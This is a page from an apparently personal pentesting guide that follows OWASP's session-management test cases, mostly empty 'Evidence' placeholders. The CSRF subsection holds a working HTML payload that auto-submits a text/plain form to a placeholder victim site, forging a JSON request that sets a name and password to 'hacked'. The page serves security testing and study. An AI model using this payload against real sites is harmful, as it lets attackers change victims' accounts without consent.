The Pentesting Guide
TwitterBlog
  • The Pentesting Guide
  • ℹ️0 - Pre-Engagement
  • 🔍1 - Information Gathering
  • Passive (OSINT)
  • Active
    • 🕵️HUMINT
    • WIFI
    • IP & Port Scanning
    • Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 53 - DNS
      • 80,443 - WEB
      • 88 - Kerberos
      • 110 - POP3
      • 111 - rpcbind
      • 161 - SNMP
      • 389 - LDAP
      • 139,445 - SMB
      • Active Directory
  • 💣2 - Exploitation
  • Brute Forcing
  • WEB
    • Apache Tomcat
    • Authentication
    • Broken Access Control
    • Cache poisoning
    • Clickjacking
    • CORS
    • CSRF
    • File Inclusion
    • Host Header Injection
    • HTTP Request Smuggling
    • Information disclosure
    • JWT
    • OS command injection
    • PHP deserialisation
    • SQLi
    • SSRF
    • SSTI
    • Shellshock
    • Unrestricted File Upload
    • XSS
    • XXE
  • Web (OWASP Test cases)
    • 4.1 Information Gathering
    • 4.2 Configuration and Deployment Management Testing
    • 4.3 Identity Management Testing
    • 4.4 Authentication Testing
    • 4.5 Authorization Testing
    • 4.6 Session Management Testing
    • 4.7 Input Validation Testing
    • 4.8 Testing for Error Handling
    • 4.9 Testing for Weak Cryptography
    • 4.10 Business Logic Testing
    • 4.11 Client-side Testing
    • 4.12 API Testing
  • WIFI
  • HUMINT
    • 🎣Gophish (Phishing)
    • Malicious Phishing Files
    • Phishing Evaluation
  • BoF - Windows(x86)
  • Active Directory
    • Kerberos
    • GPOs
    • Certificates
    • LAPS
    • Domain Trusts
  • 👿3 - Post Exploitation
  • File transfer
  • Shells
  • Situational Awareness
    • Containers and VMs
    • Linux
    • Windows
      • Dumping Credentials
      • Countermeasure Evasion
    • Active Directory
      • BloodHound & SharpHound
  • General
    • Linux
    • Windows
  • Local Privilege Escalation
    • Linux
    • Windows
  • Persistance
    • Windows
  • Cracking
  • Pivoting
    • Tunnelling & Port Forwarding
  • Lateral Movement
  • WIFI
  • 📓4 - Report
  • 🧹5 - House cleaning
Powered by GitBook
On this page
  • Session Management Testing
  • 4.6.1 Testing for Session Management Schema
  • 4.6.2 Testing for Cookies Attributes
  • 4.6.3 Testing for Session Fixation
  • 4.6.4 Testing for Exposed Session Variables
  • 4.6.5 Testing for Cross Site Request Forgery
  • 4.6.6 Testing for Logout Functionality
  • 4.6.7 Testing Session Timeout
  • 4.6.8 Testing for Session Puzzling
  • 4.6.9 Testing for Session Hijacking
  • 4.6.10 Testing JSON Web Tokens
  • 4.6.11 Testing for Concurrent Sessions
  1. Web (OWASP Test cases)

4.6 Session Management Testing

Session Management Testing

4.6.1 Testing for Session Management Schema

Evidence:

​

4.6.2 Testing for Cookies Attributes

Evidence:

​

4.6.3 Testing for Session Fixation

Evidence:

​

4.6.4 Testing for Exposed Session Variables

Evidence:

​

4.6.5 Testing for Cross Site Request Forgery

We’ll have to change the encoding type (enctype) to text/plain to ensure the payload is delivered as-is.

<html>
 <body>
  <script>history.pushState('', '', '/')</script>
   <form action='http://victimsite.com' method='POST' enctype='text/plain'>
     <input type='hidden' name='{"name":"hacked","password":"hacked","padding":"'value='something"}' />
     <input type='submit' value='Submit request' />
   </form>
 </body>
</html>

Evidence:

​

4.6.6 Testing for Logout Functionality

Evidence:

​

4.6.7 Testing Session Timeout

Evidence:

​

4.6.8 Testing for Session Puzzling

This vulnerability occurs when an application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.

Evidence:

​

4.6.9 Testing for Session Hijacking

Evidence:

​

4.6.10 Testing JSON Web Tokens

Evidence:

​

4.6.11 Testing for Concurrent Sessions

Evidence:

​

Last updated 6 months ago